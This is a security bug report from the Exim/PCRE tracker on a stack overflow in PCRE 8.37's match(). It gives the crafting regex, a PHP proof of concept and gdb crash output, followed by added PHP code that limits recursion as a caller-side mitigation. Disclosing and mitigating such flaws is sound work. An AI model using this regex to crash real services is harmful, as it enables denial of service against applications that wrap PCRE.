https://bugs.exim.org/show_bug.cgi?id=1673
Bug ID: 1673
Summary: PCRE Library Call Stack Overflow Vulnerability in pcre_exec.c
Product: PCRE
Version: 8.37
Hardware: All
OS: All
Status: NEW
Severity: security
Priority: medium
Component: Code
Assignee: p...@hermes.cam.ac.uk
Reporter: rubym...@yeah.net
CC: pcre-dev@exim.org

I. Summary

PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx and PHP. The PCRE library is prone to a vulnerability which leads to a stack overflow. Without enough bound checking inside match(), the stack memory could be overflowed via a crafted regular expression.

------------------------------------------------------------------

II. Description

The latest version of PCRE is prone to a stack overflow vulnerability which could be caused by the following regular expression.

/(?(?=.*b)b|^(?(?=.*b)br^)+)+/

To reproduce the problem, we could use pcretest, provided by the PCRE library, or applications which wrap PCRE, such as PHP.

For pcretest, simply type the regular expression after the re> prompt.

For PHP, the latest version, PHP 5.6.12 (wrapping PCRE 8.37), could be triggered by the following code snippet.

<?php
preg_match("/(?(?=.*b)b|^(?(?=.*b)br^)+)+/","ADLAB");
?>

Other versions and applications may also be affected.

The following test was conducted under Ubuntu 14.10 x64 with php 5.6.12:

==============================================================
(gdb) r poc.php
Starting program: /home/bins/php/sapi/cli/php poc.php

Program received signal SIGSEGV, Segmentation fault.
0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
516 {
(gdb) bt
#0 0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
#1 0x0000000000620db8 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15850) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:6178
#2 0x00000000005e7c57 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15849) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1541
#3 0x00000000005ef607 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15848) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1388
#4 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15847) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#5 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15846) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#6 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15845) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#7 0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb "\035bx", mstart=0x7ffff7eb2e28 "ADLAB", offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15844) at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061

------------------------------------------------------------------

III. Impact

Stack Overflow

------------------------------------------------------------------

IV. Affected

PCRE 8.37 is confirmed to be vulnerable. PCRE2 is not affected. Other applications may also be affected.

------------------------------------------------------------------

V. Credit

Wen Guanxing from Venustech ADLAB is credited for this vulnerability.
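A caller-side mitigation for PHP deployments that wrap PCRE, added here as an example that is not part of the bug report or of PCRE itself: pcre.recursion_limit maps to PCRE's match_limit_recursion, so nested match() calls are cut off with PCRE_ERROR_RECURSIONLIMIT (PREG_RECURSION_LIMIT_ERROR in PHP) before the C stack is exhausted, provided the limit times the per-frame stack use fits the thread's stack, which is an assumption about the build. The limit values, the guarded_preg_match() name and the sample inputs are constructed for illustration; this bounds recursion depth from the outside and does not replace a fixed library.

```php
<?php
// Added example, not from the bug report: caller-side hardening for PHP code
// that hands complex or untrusted patterns to preg_match().
// Limit values below are assumptions for illustration; tune them per application.

// pcre.recursion_limit maps to PCRE's match_limit_recursion: pcre_exec() gives up
// with PCRE_ERROR_RECURSIONLIMIT once match() nests this deep, instead of recursing
// until the C stack is gone. It only helps if limit * per-frame stack use fits the
// thread's stack, so keep it well below the 100000 default.
ini_set('pcre.recursion_limit', '2000');
// pcre.backtrack_limit maps to PCRE's match_limit and bounds total match() calls.
ini_set('pcre.backtrack_limit', '100000');

/**
 * preg_match() wrapper that distinguishes "no match" (0) from an aborted match.
 * Returns 1 (match), 0 (no match) or a string naming the PCRE error.
 */
function guarded_preg_match($pattern, $subject, array &$m = null)
{
    $rc = preg_match($pattern, $subject, $m);
    if ($rc === false) {
        // preg_match() returns false for compile errors and for internal limits alike;
        // preg_last_error() tells them apart so a limit hit is not logged as "no match".
        switch (preg_last_error()) {
            case PREG_RECURSION_LIMIT_ERROR: return 'recursion-limit';
            case PREG_BACKTRACK_LIMIT_ERROR: return 'backtrack-limit';
            case PREG_INTERNAL_ERROR:        return 'internal-error';
            default:                         return 'error';
        }
    }
    return $rc;
}

// Constructed inputs: a benign pattern, then a nested quantifier that backtracks
// exponentially on a subject that contains the required 'b' but cannot match.
$r1 = guarded_preg_match('/^AD/', 'ADLAB');
$r2 = guarded_preg_match('/(?:a+)+b/', str_repeat('a', 40) . 'cb');
var_dump($r1, $r2);
```

The same two limits exist in the C API as the match_limit and match_limit_recursion fields of pcre_extra, for code that calls pcre_exec() directly.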